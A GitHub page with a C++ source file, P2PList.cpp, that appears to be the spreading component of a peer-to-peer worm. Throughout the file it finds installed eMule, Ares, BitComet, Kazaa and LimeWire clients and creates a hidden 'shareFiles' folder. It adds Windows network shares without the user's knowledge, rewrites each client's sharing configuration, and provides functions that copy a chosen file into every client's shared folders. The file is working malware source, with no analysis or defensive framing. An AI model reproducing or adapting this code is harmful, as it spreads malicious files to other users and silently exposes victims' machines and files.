-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathP2PList.cpp
344 lines (314 loc) · 25.3 KB
/
P2PList.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
#include "P2PList.h"
P2P ** P2PList::P2PSoftwareList;
int P2PList::numElems = 0;
unsigned int P2PList::portSelected = 0;
bool P2PList::inicialized = false;
void P2PList::inicialize() {
if (!P2PList::inicialized) {
P2PList::P2PSoftwareList = (P2P **) malloc(sizeof(P2P *));
P2PList::inicialized = true;
}
}
bool P2PList::scanP2PSoftwareLocalMachine(bool selectPort) {
WINRegistry * WinReg = new WINRegistry();
char * pValue;
char * keyReg;
bool findIncomingFolder[NUMP2P], limitedUser;
P2PList::portSelected = 0;
if (P2PList::inicialized) {
for (int i = 0; i < NUMP2P; i++) findIncomingFolder[i] = false;
char ** plsoft = WinReg->RegQueryEnumerationUninstallSoftware();
for (int i = 0;(i < WinReg->getCountElems()); i++) {
limitedUser = true;
if (strstr(*(plsoft + i), "eMule") != NULL) {
keyReg = (char *) malloc(strlen("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\") + strlen(*(plsoft + i)) + 1);
strcpy(keyReg, (string("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\") + string(*(plsoft + i))).c_str());
pValue = WinReg->RegQueryValue(keyReg, "UninstallString");
if (pValue != NULL) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PEmule *) malloc(sizeof(P2PEmule));
if (FunctionsFiles::fileExists((string(FunctionsStrings::eraseLastToken(pValue, '\\')) + string("config\\shareddir.dat")).c_str())) {
if (getenv("USERPROFILE") != NULL) {
if ((mkdir((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str()) == 0) || (FunctionsFiles::fileExists((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str()))) {
SetFileAttributes((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str(), FILE_ATTRIBUTE_HIDDEN);
NetBios::netShareDirectoryAdd((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str(), "eMule", "eMule Share Directory");
FunctionsFiles::putTextToFile((string(FunctionsStrings::eraseLastToken(pValue, '\\')) + string("config\\shareddir.dat")).c_str(), (string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str());
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PEmule(FunctionsStrings::eraseLastToken(pValue, '\\'), (string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str());
limitedUser = false;
}
}
else {
if ((mkdir("c:\\shareFiles") == 0) || (FunctionsFiles::fileExists("c:\\shareFiles"))) {
SetFileAttributes("c:\\shareFiles", FILE_ATTRIBUTE_HIDDEN);
NetBios::netShareDirectoryAdd("c:\\shareFiles", "eMule", "eMule Share Directory");
FunctionsFiles::putTextToFile((string(FunctionsStrings::eraseLastToken(pValue, '\\')) + string("config\\shareddir.dat")).c_str(), "c:\\shareFiles");
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PEmule(FunctionsStrings::eraseLastToken(pValue, '\\'), "c:\\shareFiles");
limitedUser = false;
}
}
}
if (limitedUser) {
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PEmule(FunctionsStrings::eraseLastToken(pValue, '\\'), (string(FunctionsStrings::eraseLastToken(pValue, '\\')) + string("Incoming")).c_str());
NetBios::netShareDirectoryAdd((string(FunctionsStrings::eraseLastToken(pValue, '\\')) + string("Incoming")).c_str(), "eMule", "eMule Share Directory");
}
if ((P2PList::portSelected == 0) && (selectPort)) {
if ((*(P2PList::P2PSoftwareList + P2PList::numElems))->scanListeningPort()) P2PList::portSelected = (*(P2PList::P2PSoftwareList + P2PList::numElems))->getListeningPort();
}
P2PList::numElems++; findIncomingFolder[0] = true;
}
free(keyReg);
}
else if (strstr(*(plsoft + i), "Ares") != NULL) {
for(int i = 0; ((i < 2) && (findIncomingFolder[1] == false)); i++) {
if (i == 0) {
keyReg = (char *) malloc(strlen("HKEY_CURRENT_USER\\Software\\Ares") + 1);
strcpy(keyReg, "HKEY_CURRENT_USER\\Software\\Ares");
}
else {
keyReg = (char *) malloc(strlen("HKEY_LOCAL_MACHINE\\Software\\Ares") + 1);
strcpy(keyReg, "HKEY_LOCAL_MACHINE\\Software\\Ares");
}
pValue = WinReg->RegQueryValue(keyReg, "Download.Folder");
if (pValue != NULL) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PAres *) malloc(sizeof(P2PAres));
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PAres("", FunctionsStrings::castingHexToString(pValue));
NetBios::netShareDirectoryAdd(FunctionsStrings::castingHexToString(pValue), "Ares", "Ares Share Directory");
if ((P2PList::portSelected == 0) && (selectPort)) {
if ((*(P2PList::P2PSoftwareList + P2PList::numElems))->scanListeningPort()) P2PList::portSelected = (*(P2PList::P2PSoftwareList + P2PList::numElems))->getListeningPort();
}
P2PList::numElems++; findIncomingFolder[1] = true;
}
free(keyReg);
}
}
else if (strstr(*(plsoft + i), "BitComet") != NULL) {
keyReg = (char *) malloc(strlen("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\") + strlen(*(plsoft + i)) + 1);
strcpy(keyReg, (string("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\") + string(*(plsoft + i))).c_str());
pValue = WinReg->RegQueryValue(keyReg, "UninstallString");
if (pValue != NULL) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PBitComet *) malloc(sizeof(P2PBitComet));
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PBitComet(FunctionsStrings::eraseLastToken(pValue, '\\'), (string(FunctionsStrings::eraseLastToken(pValue, '\\')) + string("share")).c_str());
NetBios::netShareDirectoryAdd((string(FunctionsStrings::eraseLastToken(pValue, '\\')) + string("share")).c_str(), "BitComet", "BitComet Share Directory");
if ((P2PList::portSelected == 0) && (selectPort)) {
if ((*(P2PList::P2PSoftwareList + P2PList::numElems))->scanListeningPort()) P2PList::portSelected = (*(P2PList::P2PSoftwareList + P2PList::numElems))->getListeningPort();
}
P2PList::numElems++; findIncomingFolder[2] = true;
}
free(keyReg);
}
else if ((strstr(*(plsoft + i), "kazaa") != NULL) || (strstr(*(plsoft + i), "Kazaa") != NULL)) {
for(int i = 0; ((i < 2) && (findIncomingFolder[3] == false)); i++) {
if (i == 0) {
keyReg = (char *) malloc(strlen("HKEY_CURRENT_USER\\Software\\Kazaa\\LocalContent") + 1);
strcpy(keyReg, "HKEY_CURRENT_USER\\Software\\Kazaa\\LocalContent");
}
else {
keyReg = (char *) malloc(strlen("HKEY_LOCAL_MACHINE\\Software\\Kazaa\\LocalContent") + 1);
strcpy(keyReg, "HKEY_LOCAL_MACHINE\\Software\\Kazaa\\LocalContent");
}
pValue = WinReg->RegQueryValue(keyReg, "DownloadDir");
if (pValue != NULL) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PKazaa *) malloc(sizeof(P2PKazaa));
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PKazaa("", pValue);
NetBios::netShareDirectoryAdd(pValue, "Kazaa", "Kazaa Share Directory");
if ((P2PList::portSelected == 0) && (selectPort)) {
if ((*(P2PList::P2PSoftwareList + P2PList::numElems))->scanListeningPort()) P2PList::portSelected = (*(P2PList::P2PSoftwareList + P2PList::numElems))->getListeningPort();
}
P2PList::numElems++; findIncomingFolder[3] = true;
}
free(keyReg);
}
}
else if (strstr(*(plsoft + i), "LimeWire") != NULL) {
keyReg = (char *) malloc(strlen("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\") + strlen(*(plsoft + i)) + 1);
strcpy(keyReg, (string("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\") + string(*(plsoft + i))).c_str());
pValue = WinReg->RegQueryValue(keyReg, "UninstallString");
if (pValue != NULL) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PLimeWire *) malloc(sizeof(P2PLimeWire));
if (getenv("APPDATA") != NULL) {
if (FunctionsFiles::fileExists((string(getenv("APPDATA")) + string("\\LimeWire\\limewire.props")).c_str())) {
if (getenv("USERPROFILE") != NULL) {
if ((mkdir((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str()) == 0) || (FunctionsFiles::fileExists((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str()))){
SetFileAttributes((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str(), FILE_ATTRIBUTE_HIDDEN);
NetBios::netShareDirectoryAdd((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str(), "LimeWire", "LimeWire Share Directory");
FunctionsFiles::appendTextToFileAndErasePatern((string(getenv("APPDATA")) + string("\\LimeWire\\limewire.props")).c_str(), "DIRECTORIES_TO_SEARCH_FOR_FILES", (string("DIRECTORIES_TO_SEARCH_FOR_FILES=") + string(FunctionsStrings::replaceCharacters(getenv("USERPROFILE"), '\\', "\\\\")) + string("\\\\shareFiles")).c_str());
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PLimeWire(FunctionsStrings::eraseLastToken(pValue, '\\'), (string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str());
limitedUser = false;
}
}
else {
if ((mkdir("c:\\shareFiles") == 0) || (FunctionsFiles::fileExists("c:\\shareFiles"))) {
SetFileAttributes("c:\\shareFiles", FILE_ATTRIBUTE_HIDDEN);
NetBios::netShareDirectoryAdd("c:\\shareFiles", "LimeWire", "LimeWire Share Directory");
FunctionsFiles::appendTextToFileAndErasePatern((string(getenv("APPDATA")) + string("\\LimeWire\\limewire.props")).c_str(), "DIRECTORIES_TO_SEARCH_FOR_FILES", "DIRECTORIES_TO_SEARCH_FOR_FILES=c\\:\\\\shareFiles");
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PLimeWire(FunctionsStrings::eraseLastToken(pValue, '\\'), "c:\\shareFiles");
limitedUser = false;
}
}
if ((P2PList::portSelected == 0) && (!limitedUser) && (selectPort)) {
if ((*(P2PList::P2PSoftwareList + P2PList::numElems))->scanListeningPort()) P2PList::portSelected = (*(P2PList::P2PSoftwareList + P2PList::numElems))->getListeningPort();
}
}
}
if (limitedUser) {
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PLimeWire(FunctionsStrings::eraseLastToken(pValue, '\\'), (string(FunctionsStrings::eraseLastToken(pValue, '\\')) + string(".NetworkShare")).c_str());
NetBios::netShareDirectoryAdd((string(FunctionsStrings::eraseLastToken(pValue, '\\')) + string(".NetworkShare")).c_str(), "LimeWire", "LimeWire Share Directory");
}
P2PList::numElems++; findIncomingFolder[4] = true;
}
free(keyReg);
}
}
/* CHECK IF P2P APP IS INSTALLED WITHOUT SETUP */
if (getenv("ProgramFiles") != NULL) {
if (findIncomingFolder[0] == false) {
if (FunctionsFiles::fileExists((string(getenv("ProgramFiles")) + string("\\eMule")).c_str())) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PEmule *) malloc(sizeof(P2PEmule));
if (FunctionsFiles::fileExists((string(getenv("ProgramFiles")) + string("\\eMule\\config\\shareddir.dat")).c_str())) {
if (getenv("USERPROFILE") != NULL) {
if ((mkdir((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str()) == 0) || (FunctionsFiles::fileExists((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str()))) {
SetFileAttributes((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str(), FILE_ATTRIBUTE_HIDDEN);
NetBios::netShareDirectoryAdd((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str(), "eMule", "eMule Share Directory");
FunctionsFiles::putTextToFile((string(getenv("ProgramFiles")) + string("\\eMule\\config\\shareddir.dat")).c_str(), (string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str());
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PEmule((string(getenv("ProgramFiles")) + string("\\eMule")).c_str(), (string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str());
limitedUser = false;
}
}
else {
if ((mkdir("c:\\shareFiles") == 0) || (FunctionsFiles::fileExists("c:\\shareFiles"))) {
SetFileAttributes("c:\\shareFiles", FILE_ATTRIBUTE_HIDDEN);
NetBios::netShareDirectoryAdd("c:\\shareFiles", "eMule", "eMule Share Directory");
FunctionsFiles::putTextToFile((string(getenv("ProgramFiles")) + string("\\eMule\\config\\shareddir.dat")).c_str(), "c:\\shareFiles");
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PEmule((string(getenv("ProgramFiles")) + string("\\eMule")).c_str(), "c:\\shareFiles");
limitedUser = false;
}
}
}
if (limitedUser) {
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PEmule((string(getenv("ProgramFiles")) + string("\\eMule")).c_str(), (string(getenv("ProgramFiles")) + string("\\eMule\\Incoming")).c_str());
NetBios::netShareDirectoryAdd((string(getenv("ProgramFiles")) + string("\\eMule\\Incoming")).c_str(), "eMule", "eMule Share Directory");
}
if ((P2PList::portSelected == 0) && (selectPort)) {
if ((*(P2PList::P2PSoftwareList + P2PList::numElems))->scanListeningPort()) P2PList::portSelected = (*(P2PList::P2PSoftwareList + P2PList::numElems))->getListeningPort();
}
P2PList::numElems++; findIncomingFolder[0] = true;
}
}
if (findIncomingFolder[1] == false) {
if (FunctionsFiles::fileExists((string(getenv("ProgramFiles")) + string("\\Ares\\My Shared Folder")).c_str())) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PAres *) malloc(sizeof(P2PAres));
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PAres("", (string(getenv("ProgramFiles")) + string("\\Ares\\My Shared Folder")).c_str());
NetBios::netShareDirectoryAdd((string(getenv("ProgramFiles")) + string("\\Ares\\My Shared Folder")).c_str(), "Ares", "Ares Share Directory");
P2PList::numElems++; findIncomingFolder[1] = true;
}
}
if (findIncomingFolder[2] == false) {
if (FunctionsFiles::fileExists((string(getenv("ProgramFiles")) + string("\\BitComet\\share")).c_str())) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PBitComet *) malloc(sizeof(P2PBitComet));
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PBitComet((string(getenv("ProgramFiles")) + string("\\BitComet")).c_str(), (string(getenv("ProgramFiles")) + string("\\BitComet\\share")).c_str());
NetBios::netShareDirectoryAdd((string(getenv("ProgramFiles")) + string("\\BitComet\\share")).c_str(), "BitComet", "BitComet Share Directory");
if ((P2PList::portSelected == 0) && (selectPort)) {
if ((*(P2PList::P2PSoftwareList + P2PList::numElems))->scanListeningPort()) P2PList::portSelected = (*(P2PList::P2PSoftwareList + P2PList::numElems))->getListeningPort();
}
P2PList::numElems++; findIncomingFolder[2] = true;
}
}
if (findIncomingFolder[3] == false) {
for(int i = 0; ((i < 2) && (findIncomingFolder[3] == false)); i++) {
if (i == 0) {
keyReg = (char *) malloc(strlen("HKEY_CURRENT_USER\\Software\\Kazaa\\LocalContent") + 1);
strcpy(keyReg, "HKEY_CURRENT_USER\\Software\\Kazaa\\LocalContent");
}
else {
keyReg = (char *) malloc(strlen("HKEY_LOCAL_MACHINE\\Software\\Kazaa\\LocalContent") + 1);
strcpy(keyReg, "HKEY_LOCAL_MACHINE\\Software\\Kazaa\\LocalContent");
}
pValue = WinReg->RegQueryValue(keyReg, "DownloadDir");
if (pValue != NULL) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PKazaa *) malloc(sizeof(P2PKazaa));
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PKazaa("", pValue);
NetBios::netShareDirectoryAdd(pValue, "Kazaa", "Kazaa Share Directory");
if ((P2PList::portSelected == 0) && (selectPort)) {
if ((*(P2PList::P2PSoftwareList + P2PList::numElems))->scanListeningPort()) P2PList::portSelected = (*(P2PList::P2PSoftwareList + P2PList::numElems))->getListeningPort();
}
P2PList::numElems++; findIncomingFolder[3] = true;
}
free(keyReg);
}
if (findIncomingFolder[3] == false) {
if (FunctionsFiles::fileExists((string(getenv("ProgramFiles")) + string("\\Kazaa\\My Shared Folder")).c_str())) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PKazaa *) malloc(sizeof(P2PKazaa));
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PKazaa((string(getenv("ProgramFiles")) + string("\\Kazaa")).c_str(), (string(getenv("ProgramFiles")) + string("\\Kazaa\\My Shared Folder")).c_str());
NetBios::netShareDirectoryAdd((string(getenv("ProgramFiles")) + string("\\Kazaa\\My Shared Folder")).c_str(), "Kazaa", "Kazaa Share Directory");
P2PList::numElems++; findIncomingFolder[3] = true;
}
}
}
if (findIncomingFolder[4] == false) {
if (FunctionsFiles::fileExists((string(getenv("ProgramFiles")) + string("\\LimeWire")).c_str())) {
if (P2PList::numElems > 0) P2PList::P2PSoftwareList = (P2P **) realloc(P2PList::P2PSoftwareList, sizeof(P2P *) * (P2PList::numElems + 1));
*(P2PList::P2PSoftwareList + P2PList::numElems) = (P2PLimeWire *) malloc(sizeof(P2PLimeWire));
if (getenv("APPDATA") != NULL) {
if (FunctionsFiles::fileExists((string(getenv("APPDATA")) + string("\\LimeWire\\limewire.props")).c_str())) {
if (getenv("USERPROFILE") != NULL) {
if ((mkdir((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str()) == 0) || (FunctionsFiles::fileExists((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str()))) {
SetFileAttributes((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str(), FILE_ATTRIBUTE_HIDDEN);
NetBios::netShareDirectoryAdd((string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str(), "LimeWire", "LimeWire Share Directory");
FunctionsFiles::appendTextToFileAndErasePatern((string(getenv("APPDATA")) + string("\\LimeWire\\limewire.props")).c_str(), "DIRECTORIES_TO_SEARCH_FOR_FILES", (string("DIRECTORIES_TO_SEARCH_FOR_FILES=") + string(FunctionsStrings::replaceCharacters(getenv("USERPROFILE"), '\\', "\\\\")) + string("\\\\shareFiles")).c_str());
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PLimeWire((string(getenv("ProgramFiles")) + string("\\LimeWire")).c_str(), (string(getenv("USERPROFILE")) + string("\\shareFiles")).c_str());
limitedUser = false;
}
}
else {
if ((mkdir("c:\\shareFiles") == 0) || (FunctionsFiles::fileExists("c:\\shareFiles"))) {
SetFileAttributes("c:\\shareFiles", FILE_ATTRIBUTE_HIDDEN);
NetBios::netShareDirectoryAdd("c:\\shareFiles", "LimeWire", "LimeWire Share Directory");
FunctionsFiles::appendTextToFileAndErasePatern((string(getenv("APPDATA")) + string("\\LimeWire\\limewire.props")).c_str(), "DIRECTORIES_TO_SEARCH_FOR_FILES", "DIRECTORIES_TO_SEARCH_FOR_FILES=c\\:\\\\shareFiles");
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PLimeWire((string(getenv("ProgramFiles")) + string("\\LimeWire")).c_str(), "c:\\shareFiles");
limitedUser = false;
}
}
if ((P2PList::portSelected == 0) && (!limitedUser) && (selectPort)) {
if ((*(P2PList::P2PSoftwareList + P2PList::numElems))->scanListeningPort()) P2PList::portSelected = (*(P2PList::P2PSoftwareList + P2PList::numElems))->getListeningPort();
}
}
}
if (limitedUser) {
*(P2PList::P2PSoftwareList + P2PList::numElems) = new P2PLimeWire((string(getenv("ProgramFiles")) + string("\\LimeWire")).c_str(), (string(getenv("ProgramFiles")) + string("\\LimeWire\\.NetworkShare")).c_str());
NetBios::netShareDirectoryAdd((string(getenv("ProgramFiles")) + string("\\LimeWire\\.NetworkShare")).c_str(), "LimeWire", "LimeWire Share Directory");
}
P2PList::numElems++; findIncomingFolder[4] = true;
}
}
}
if (P2PList::numElems > 0) return true;
}
return false;
}
bool P2PList::copyFileToIncomingFolderHacking(const char strFilename[]) {
if ((P2PList::numElems > 0) && (P2PList::inicialized)) {
for(int i = 0; i < P2PList::numElems; i++) P2PList::P2PSoftwareList[i]->copyFileToIncomingFolderHacking(strFilename);
return true;
}
return false;
}
bool P2PList::copyFileToIncomingFolder(const char strFilename[]) {
if ((P2PList::numElems > 0) && (P2PList::inicialized)) {
for(int i = 0; i < P2PList::numElems; i++) P2PList::P2PSoftwareList[i]->copyFileToIncomingFolder(strFilename);
return true;
}
return false;
}
P2P ** P2PList::getP2PSoftwareList() {
if (P2PList::inicialized) return P2PList::P2PSoftwareList;
return NULL;
}